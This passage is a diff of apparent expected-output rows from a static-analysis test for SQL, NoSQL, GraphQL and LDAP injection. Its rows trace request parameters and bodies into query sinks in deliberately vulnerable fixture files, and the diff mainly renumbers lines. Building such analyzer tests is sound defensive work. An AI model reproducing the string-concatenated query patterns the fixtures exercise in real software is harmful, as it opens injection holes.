mongooseModelClient.js:11:22:11:22 | v | provenance | | | mongooseModelClient.js:10:11:10:32 | JSON.pa ... body.x) | mongooseModelClient.js:10:7:10:32 | v | provenance | | @@ -621,24 +621,24 @@ edges | redis.js:38:17:38:28 | req.body.key | redis.js:38:11:38:28 | key | provenance | | | socketio.js:10:25:10:30 | handle | socketio.js:11:46:11:51 | handle | provenance | | | socketio.js:11:46:11:51 | handle | socketio.js:11:12:11:53 | `INSERT ... andle}` | provenance | | -| tst2.js:9:66:9:78 | req.params.id | tst2.js:9:27:9:84 | "select ... d + "'" | provenance | | +| tst2.js:8:66:8:78 | req.params.id | tst2.js:8:27:8:84 | "select ... d + "'" | provenance | | | tst3.js:7:7:8:55 | query1 | tst3.js:9:14:9:19 | query1 | provenance | | | tst3.js:8:16:8:34 | req.params.category | tst3.js:7:7:8:55 | query1 | provenance | | | tst4.js:8:46:8:60 | $routeParams.id | tst4.js:8:10:8:66 | 'SELECT ... d + '"' | provenance | | | tst.js:10:46:10:58 | req.params.id | tst.js:10:10:10:64 | 'SELECT ... d + '"' | provenance | | subpaths #select -| graphql.js:10:34:20:5 | `\\n ... }\\n ` | graphql.js:8:16:8:28 | req.params.id | graphql.js:10:34:20:5 | `\\n ... }\\n ` | This query string depends on a $@. | graphql.js:8:16:8:28 | req.params.id | user-provided value | -| graphql.js:27:30:27:40 | `foo ${id}` | graphql.js:26:16:26:28 | req.params.id | graphql.js:27:30:27:40 | `foo ${id}` | This query string depends on a $@. | graphql.js:26:16:26:28 | req.params.id | user-provided value | -| graphql.js:30:32:30:42 | `foo ${id}` | graphql.js:26:16:26:28 | req.params.id | graphql.js:30:32:30:42 | `foo ${id}` | This query string depends on a $@. | graphql.js:26:16:26:28 | req.params.id | user-provided value | -| graphql.js:33:18:33:28 | `foo ${id}` | graphql.js:26:16:26:28 | req.params.id | graphql.js:33:18:33:28 | `foo ${id}` | This query string depends on a $@. | graphql.js:26:16:26:28 | req.params.id | user-provided value | -| graphql.js:44:14:44:24 | `foo ${id}` | graphql.js:39:16:39:28 | req.params.id | graphql.js:44:14:44:24 | `foo ${id}` | This query string depends on a $@. | graphql.js:39:16:39:28 | req.params.id | user-provided value | -| graphql.js:48:44:48:54 | `foo ${id}` | graphql.js:39:16:39:28 | req.params.id | graphql.js:48:44:48:54 | `foo ${id}` | This query string depends on a $@. | graphql.js:39:16:39:28 | req.params.id | user-provided value | -| graphql.js:56:39:56:49 | `foo ${id}` | graphql.js:55:16:55:28 | req.params.id | graphql.js:56:39:56:49 | `foo ${id}` | This query string depends on a $@. | graphql.js:55:16:55:28 | req.params.id | user-provided value | -| graphql.js:58:66:58:76 | `foo ${id}` | graphql.js:55:16:55:28 | req.params.id | graphql.js:58:66:58:76 | `foo ${id}` | This query string depends on a $@. | graphql.js:55:16:55:28 | req.params.id | user-provided value | -| graphql.js:75:46:75:64 | "{ foo" + id + " }" | graphql.js:74:14:74:25 | req.query.id | graphql.js:75:46:75:64 | "{ foo" + id + " }" | This query string depends on a $@. | graphql.js:74:14:74:25 | req.query.id | user-provided value | -| graphql.js:84:14:90:8 | `{\\n ... }` | graphql.js:74:14:74:25 | req.query.id | graphql.js:84:14:90:8 | `{\\n ... }` | This query string depends on a $@. | graphql.js:74:14:74:25 | req.query.id | user-provided value | -| graphql.js:120:38:120:48 | `foo ${id}` | graphql.js:119:16:119:28 | req.params.id | graphql.js:120:38:120:48 | `foo ${id}` | This query string depends on a $@. | graphql.js:119:16:119:28 | req.params.id | user-provided value | +| graphql.js:9:34:19:5 | ` // $ ... }\\n ` | graphql.js:8:16:8:28 | req.params.id | graphql.js:9:34:19:5 | ` // $ ... }\\n ` | This query string depends on a $@. | graphql.js:8:16:8:28 | req.params.id | user-provided value | +| graphql.js:26:30:26:40 | `foo ${id}` | graphql.js:25:16:25:28 | req.params.id | graphql.js:26:30:26:40 | `foo ${id}` | This query string depends on a $@. | graphql.js:25:16:25:28 | req.params.id | user-provided value | +| graphql.js:29:32:29:42 | `foo ${id}` | graphql.js:25:16:25:28 | req.params.id | graphql.js:29:32:29:42 | `foo ${id}` | This query string depends on a $@. | graphql.js:25:16:25:28 | req.params.id | user-provided value | +| graphql.js:32:18:32:28 | `foo ${id}` | graphql.js:25:16:25:28 | req.params.id | graphql.js:32:18:32:28 | `foo ${id}` | This query string depends on a $@. | graphql.js:25:16:25:28 | req.params.id | user-provided value | +| graphql.js:43:14:43:24 | `foo ${id}` | graphql.js:38:16:38:28 | req.params.id | graphql.js:43:14:43:24 | `foo ${id}` | This query string depends on a $@. | graphql.js:38:16:38:28 | req.params.id | user-provided value | +| graphql.js:47:44:47:54 | `foo ${id}` | graphql.js:38:16:38:28 | req.params.id | graphql.js:47:44:47:54 | `foo ${id}` | This query string depends on a $@. | graphql.js:38:16:38:28 | req.params.id | user-provided value | +| graphql.js:55:39:55:49 | `foo ${id}` | graphql.js:54:16:54:28 | req.params.id | graphql.js:55:39:55:49 | `foo ${id}` | This query string depends on a $@. | graphql.js:54:16:54:28 | req.params.id | user-provided value | +| graphql.js:57:66:57:76 | `foo ${id}` | graphql.js:54:16:54:28 | req.params.id | graphql.js:57:66:57:76 | `foo ${id}` | This query string depends on a $@. | graphql.js:54:16:54:28 | req.params.id | user-provided value | +| graphql.js:74:46:74:64 | "{ foo" + id + " }" | graphql.js:73:14:73:25 | req.query.id | graphql.js:74:46:74:64 | "{ foo" + id + " }" | This query string depends on a $@. | graphql.js:73:14:73:25 | req.query.id | user-provided value | +| graphql.js:82:14:88:8 | `{ // $ ... }` | graphql.js:73:14:73:25 | req.query.id | graphql.js:82:14:88:8 | `{ // $ ... }` | This query string depends on a $@. | graphql.js:73:14:73:25 | req.query.id | user-provided value | +| graphql.js:118:38:118:48 | `foo ${id}` | graphql.js:117:16:117:28 | req.params.id | graphql.js:118:38:118:48 | `foo ${id}` | This query string depends on a $@. | graphql.js:117:16:117:28 | req.params.id | user-provided value | | html-sanitizer.js:16:9:16:59 | `SELECT ... param1 | html-sanitizer.js:13:39:13:44 | param1 | html-sanitizer.js:16:9:16:59 | `SELECT ... param1 | This query string depends on a $@. | html-sanitizer.js:13:39:13:44 | param1 | user-provided value | | json-schema-validator.js:33:22:33:26 | query | json-schema-validator.js:25:34:25:47 | req.query.data | json-schema-validator.js:33:22:33:26 | query | This query object depends on a $@. | json-schema-validator.js:25:34:25:47 | req.query.data | user-provided value | | json-schema-validator.js:35:18:35:22 | query | json-schema-validator.js:25:34:25:47 | req.query.data | json-schema-validator.js:35:18:35:22 | query | This query object depends on a $@. | json-schema-validator.js:25:34:25:47 | req.query.data | user-provided value | @@ -650,67 +650,67 @@ subpaths | ldap.js:32:5:32:61 | { filte ... e}))` } | ldap.js:20:21:20:27 | req.url | ldap.js:32:5:32:61 | { filte ... e}))` } | This query string depends on a $@. | ldap.js:20:21:20:27 | req.url | user-provided value | | ldap.js:66:30:66:53 | { filte ... ilter } | ldap.js:20:21:20:27 | req.url | ldap.js:66:30:66:53 | { filte ... ilter } | This query string depends on a $@. | ldap.js:20:21:20:27 | req.url | user-provided value | | ldap.js:68:27:68:42 | `cn=${username}` | ldap.js:20:21:20:27 | req.url | ldap.js:68:27:68:42 | `cn=${username}` | This query string depends on a $@. | ldap.js:20:21:20:27 | req.url | user-provided value | -| marsdb-flow-to.js:14:17:14:21 | query | marsdb-flow-to.js:11:17:11:24 | req.body | marsdb-flow-to.js:14:17:14:21 | query | This query object depends on a $@. | marsdb-flow-to.js:11:17:11:24 | req.body | user-provided value | -| marsdb.js:16:12:16:16 | query | marsdb.js:13:17:13:24 | req.body | marsdb.js:16:12:16:16 | query | This query object depends on a $@. | marsdb.js:13:17:13:24 | req.body | user-provided value | -| minimongo.js:18:12:18:16 | query | minimongo.js:15:17:15:24 | req.body | minimongo.js:18:12:18:16 | query | This query object depends on a $@. | minimongo.js:15:17:15:24 | req.body | user-provided value | -| mongodb.js:18:16:18:20 | query | mongodb.js:13:19:13:26 | req.body | mongodb.js:18:16:18:20 | query | This query object depends on a $@. | mongodb.js:13:19:13:26 | req.body | user-provided value | -| mongodb.js:32:18:32:45 | { title ... itle) } | mongodb.js:26:19:26:26 | req.body | mongodb.js:32:18:32:45 | { title ... itle) } | This query object depends on a $@. | mongodb.js:26:19:26:26 | req.body | user-provided value | -| mongodb.js:54:16:54:20 | query | mongodb.js:49:19:49:33 | req.query.title | mongodb.js:54:16:54:20 | query | This query object depends on a $@. | mongodb.js:49:19:49:33 | req.query.title | user-provided value | -| mongodb.js:65:12:65:16 | query | mongodb.js:60:16:60:30 | req.query.title | mongodb.js:65:12:65:16 | query | This query object depends on a $@. | mongodb.js:60:16:60:30 | req.query.title | user-provided value | -| mongodb.js:77:14:77:26 | { tags: tag } | mongodb.js:70:13:70:25 | req.query.tag | mongodb.js:77:14:77:26 | { tags: tag } | This query object depends on a $@. | mongodb.js:70:13:70:25 | req.query.tag | user-provided value | -| mongodb.js:85:12:85:24 | { tags: tag } | mongodb.js:70:13:70:25 | req.query.tag | mongodb.js:85:12:85:24 | { tags: tag } | This query object depends on a $@. | mongodb.js:70:13:70:25 | req.query.tag | user-provided value | -| mongodb.js:112:14:112:18 | query | mongodb.js:107:17:107:29 | queries.title | mongodb.js:112:14:112:18 | query | This query object depends on a $@. | mongodb.js:107:17:107:29 | queries.title | user-provided value | -| mongodb_bodySafe.js:29:16:29:20 | query | mongodb_bodySafe.js:24:19:24:33 | req.query.title | mongodb_bodySafe.js:29:16:29:20 | query | This query object depends on a $@. | mongodb_bodySafe.js:24:19:24:33 | req.query.title | user-provided value | -| mongoose.js:24:21:24:27 | [query] | mongoose.js:21:16:21:23 | req.body | mongoose.js:24:21:24:27 | [query] | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:27:17:27:21 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:27:17:27:21 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:30:22:30:26 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:30:22:30:26 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:33:21:33:25 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:33:21:33:25 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:36:28:36:32 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:36:28:36:32 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:39:16:39:20 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:39:16:39:20 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:42:19:42:23 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:42:19:42:23 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:45:28:45:32 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:45:28:45:32 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:48:28:48:32 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:48:28:48:32 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:51:28:51:32 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:51:28:51:32 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:54:22:54:26 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:54:22:54:26 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:57:18:57:22 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:57:18:57:22 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:60:22:60:26 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:60:22:60:26 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:63:21:63:25 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:63:21:63:25 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:65:32:65:36 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:65:32:65:36 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:67:27:67:31 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:67:27:67:31 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:68:8:68:12 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:68:8:68:12 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:71:17:71:21 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:71:17:71:21 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:72:10:72:14 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:72:10:72:14 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:73:8:73:12 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:73:8:73:12 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:74:7:74:11 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:74:7:74:11 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:75:16:75:20 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:75:16:75:20 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:77:10:77:14 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:77:10:77:14 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| marsdb-flow-to.js:13:17:13:21 | query | marsdb-flow-to.js:11:17:11:24 | req.body | marsdb-flow-to.js:13:17:13:21 | query | This query object depends on a $@. | marsdb-flow-to.js:11:17:11:24 | req.body | user-provided value | +| marsdb.js:15:12:15:16 | query | marsdb.js:13:17:13:24 | req.body | marsdb.js:15:12:15:16 | query | This query object depends on a $@. | marsdb.js:13:17:13:24 | req.body | user-provided value | +| minimongo.js:17:12:17:16 | query | minimongo.js:15:17:15:24 | req.body | minimongo.js:17:12:17:16 | query | This query object depends on a $@. | minimongo.js:15:17:15:24 | req.body | user-provided value | +| mongodb.js:17:16:17:20 | query | mongodb.js:13:19:13:26 | req.body | mongodb.js:17:16:17:20 | query | This query object depends on a $@. | mongodb.js:13:19:13:26 | req.body | user-provided value | +| mongodb.js:30:18:30:45 | { title ... itle) } | mongodb.js:25:19:25:26 | req.body | mongodb.js:30:18:30:45 | { title ... itle) } | This query object depends on a $@. | mongodb.js:25:19:25:26 | req.body | user-provided value | +| mongodb.js:51:16:51:20 | query | mongodb.js:47:19:47:33 | req.query.title | mongodb.js:51:16:51:20 | query | This query object depends on a $@. | mongodb.js:47:19:47:33 | req.query.title | user-provided value | +| mongodb.js:61:12:61:16 | query | mongodb.js:57:16:57:30 | req.query.title | mongodb.js:61:12:61:16 | query | This query object depends on a $@. | mongodb.js:57:16:57:30 | req.query.title | user-provided value | +| mongodb.js:72:14:72:26 | { tags: tag } | mongodb.js:66:13:66:25 | req.query.tag | mongodb.js:72:14:72:26 | { tags: tag } | This query object depends on a $@. | mongodb.js:66:13:66:25 | req.query.tag | user-provided value | +| mongodb.js:79:12:79:24 | { tags: tag } | mongodb.js:66:13:66:25 | req.query.tag | mongodb.js:79:12:79:24 | { tags: tag } | This query object depends on a $@. | mongodb.js:66:13:66:25 | req.query.tag | user-provided value | +| mongodb.js:105:14:105:18 | query | mongodb.js:101:17:101:29 | queries.title | mongodb.js:105:14:105:18 | query | This query object depends on a $@. | mongodb.js:101:17:101:29 | queries.title | user-provided value | +| mongodb_bodySafe.js:28:16:28:20 | query | mongodb_bodySafe.js:24:19:24:33 | req.query.title | mongodb_bodySafe.js:28:16:28:20 | query | This query object depends on a $@. | mongodb_bodySafe.js:24:19:24:33 | req.query.title | user-provided value | +| mongoose.js:23:21:23:27 | [query] | mongoose.js:21:16:21:23 | req.body | mongoose.js:23:21:23:27 | [query] | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:25:17:25:21 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:25:17:25:21 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:27:22:27:26 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:27:22:27:26 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:29:21:29:25 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:29:21:29:25 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:31:28:31:32 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:31:28:31:32 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:33:16:33:20 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:33:16:33:20 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:35:19:35:23 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:35:19:35:23 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:37:28:37:32 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:37:28:37:32 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:39:28:39:32 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:39:28:39:32 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:41:28:41:32 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:41:28:41:32 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:43:22:43:26 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:43:22:43:26 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:45:18:45:22 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:45:18:45:22 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:47:22:47:26 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:47:22:47:26 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:49:21:49:25 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:49:21:49:25 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:51:32:51:36 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:51:32:51:36 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:53:27:53:31 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:53:27:53:31 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:54:8:54:12 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:54:8:54:12 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:57:17:57:21 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:57:17:57:21 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:58:10:58:14 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:58:10:58:14 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:59:8:59:12 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:59:8:59:12 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:60:7:60:11 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:60:7:60:11 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:61:16:61:20 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:61:16:61:20 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:63:10:63:14 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:63:10:63:14 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:68:46:68:50 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:68:46:68:50 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:69:47:69:51 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:69:47:69:51 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:71:46:71:50 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:71:46:71:50 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:73:51:73:55 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:73:51:73:55 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:75:46:75:50 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:75:46:75:50 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:78:46:78:50 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:78:46:78:50 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:80:51:80:55 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:80:51:80:55 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | | mongoose.js:82:46:82:50 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:82:46:82:50 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:83:47:83:51 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:83:47:83:51 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:85:46:85:50 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:85:46:85:50 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:87:51:87:55 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:87:51:87:55 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:89:46:89:50 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:89:46:89:50 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:92:46:92:50 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:92:46:92:50 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:94:51:94:55 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:94:51:94:55 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:96:46:96:50 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:96:46:96:50 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:111:14:111:18 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:111:14:111:18 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:113:31:113:35 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:113:31:113:35 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:116:22:116:25 | cond | mongoose.js:115:32:115:45 | req.query.cond | mongoose.js:116:22:116:25 | cond | This query object depends on a $@. | mongoose.js:115:32:115:45 | req.query.cond | user-provided value | -| mongoose.js:117:21:117:24 | cond | mongoose.js:115:32:115:45 | req.query.cond | mongoose.js:117:21:117:24 | cond | This query object depends on a $@. | mongoose.js:115:32:115:45 | req.query.cond | user-provided value | -| mongoose.js:118:21:118:24 | cond | mongoose.js:115:32:115:45 | req.query.cond | mongoose.js:118:21:118:24 | cond | This query object depends on a $@. | mongoose.js:115:32:115:45 | req.query.cond | user-provided value | -| mongoose.js:119:18:119:21 | cond | mongoose.js:115:32:115:45 | req.query.cond | mongoose.js:119:18:119:21 | cond | This query object depends on a $@. | mongoose.js:115:32:115:45 | req.query.cond | user-provided value | -| mongoose.js:120:22:120:25 | cond | mongoose.js:115:32:115:45 | req.query.cond | mongoose.js:120:22:120:25 | cond | This query object depends on a $@. | mongoose.js:115:32:115:45 | req.query.cond | user-provided value | -| mongoose.js:121:16:121:19 | cond | mongoose.js:115:32:115:45 | req.query.cond | mongoose.js:121:16:121:19 | cond | This query object depends on a $@. | mongoose.js:115:32:115:45 | req.query.cond | user-provided value | -| mongoose.js:122:19:122:22 | cond | mongoose.js:115:32:115:45 | req.query.cond | mongoose.js:122:19:122:22 | cond | This query object depends on a $@. | mongoose.js:115:32:115:45 | req.query.cond | user-provided value | -| mongoose.js:123:20:123:21 | id | mongoose.js:115:11:115:22 | req.query.id | mongoose.js:123:20:123:21 | id | This query object depends on a $@. | mongoose.js:115:11:115:22 | req.query.id | user-provided value | -| mongoose.js:124:28:124:31 | cond | mongoose.js:115:32:115:45 | req.query.cond | mongoose.js:124:28:124:31 | cond | This query object depends on a $@. | mongoose.js:115:32:115:45 | req.query.cond | user-provided value | -| mongoose.js:125:28:125:31 | cond | mongoose.js:115:32:115:45 | req.query.cond | mongoose.js:125:28:125:31 | cond | This query object depends on a $@. | mongoose.js:115:32:115:45 | req.query.cond | user-provided value | -| mongoose.js:126:28:126:31 | cond | mongoose.js:115:32:115:45 | req.query.cond | mongoose.js:126:28:126:31 | cond | This query object depends on a $@. | mongoose.js:115:32:115:45 | req.query.cond | user-provided value | -| mongoose.js:127:18:127:21 | cond | mongoose.js:115:32:115:45 | req.query.cond | mongoose.js:127:18:127:21 | cond | This query object depends on a $@. | mongoose.js:115:32:115:45 | req.query.cond | user-provided value | -| mongoose.js:128:22:128:25 | cond | mongoose.js:115:32:115:45 | req.query.cond | mongoose.js:128:22:128:25 | cond | This query object depends on a $@. | mongoose.js:115:32:115:45 | req.query.cond | user-provided value | -| mongoose.js:129:21:129:24 | cond | mongoose.js:115:32:115:45 | req.query.cond | mongoose.js:129:21:129:24 | cond | This query object depends on a $@. | mongoose.js:115:32:115:45 | req.query.cond | user-provided value | -| mongoose.js:130:16:130:26 | { _id: id } | mongoose.js:115:11:115:22 | req.query.id | mongoose.js:130:16:130:26 | { _id: id } | This query object depends on a $@. | mongoose.js:115:11:115:22 | req.query.id | user-provided value | -| mongoose.js:136:30:136:34 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:136:30:136:34 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongooseJsonParse.js:23:19:23:23 | query | mongooseJsonParse.js:20:30:20:43 | req.query.data | mongooseJsonParse.js:23:19:23:23 | query | This query object depends on a $@. | mongooseJsonParse.js:20:30:20:43 | req.query.data | user-provided value | +| mongoose.js:97:14:97:18 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:97:14:97:18 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:99:31:99:35 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:99:31:99:35 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:102:22:102:25 | cond | mongoose.js:101:32:101:45 | req.query.cond | mongoose.js:102:22:102:25 | cond | This query object depends on a $@. | mongoose.js:101:32:101:45 | req.query.cond | user-provided value | +| mongoose.js:103:21:103:24 | cond | mongoose.js:101:32:101:45 | req.query.cond | mongoose.js:103:21:103:24 | cond | This query object depends on a $@. | mongoose.js:101:32:101:45 | req.query.cond | user-provided value | +| mongoose.js:104:21:104:24 | cond | mongoose.js:101:32:101:45 | req.query.cond | mongoose.js:104:21:104:24 | cond | This query object depends on a $@. | mongoose.js:101:32:101:45 | req.query.cond | user-provided value | +| mongoose.js:105:18:105:21 | cond | mongoose.js:101:32:101:45 | req.query.cond | mongoose.js:105:18:105:21 | cond | This query object depends on a $@. | mongoose.js:101:32:101:45 | req.query.cond | user-provided value | +| mongoose.js:106:22:106:25 | cond | mongoose.js:101:32:101:45 | req.query.cond | mongoose.js:106:22:106:25 | cond | This query object depends on a $@. | mongoose.js:101:32:101:45 | req.query.cond | user-provided value | +| mongoose.js:107:16:107:19 | cond | mongoose.js:101:32:101:45 | req.query.cond | mongoose.js:107:16:107:19 | cond | This query object depends on a $@. | mongoose.js:101:32:101:45 | req.query.cond | user-provided value | +| mongoose.js:108:19:108:22 | cond | mongoose.js:101:32:101:45 | req.query.cond | mongoose.js:108:19:108:22 | cond | This query object depends on a $@. | mongoose.js:101:32:101:45 | req.query.cond | user-provided value | +| mongoose.js:109:20:109:21 | id | mongoose.js:101:11:101:22 | req.query.id | mongoose.js:109:20:109:21 | id | This query object depends on a $@. | mongoose.js:101:11:101:22 | req.query.id | user-provided value | +| mongoose.js:110:28:110:31 | cond | mongoose.js:101:32:101:45 | req.query.cond | mongoose.js:110:28:110:31 | cond | This query object depends on a $@. | mongoose.js:101:32:101:45 | req.query.cond | user-provided value | +| mongoose.js:111:28:111:31 | cond | mongoose.js:101:32:101:45 | req.query.cond | mongoose.js:111:28:111:31 | cond | This query object depends on a $@. | mongoose.js:101:32:101:45 | req.query.cond | user-provided value | +| mongoose.js:112:28:112:31 | cond | mongoose.js:101:32:101:45 | req.query.cond | 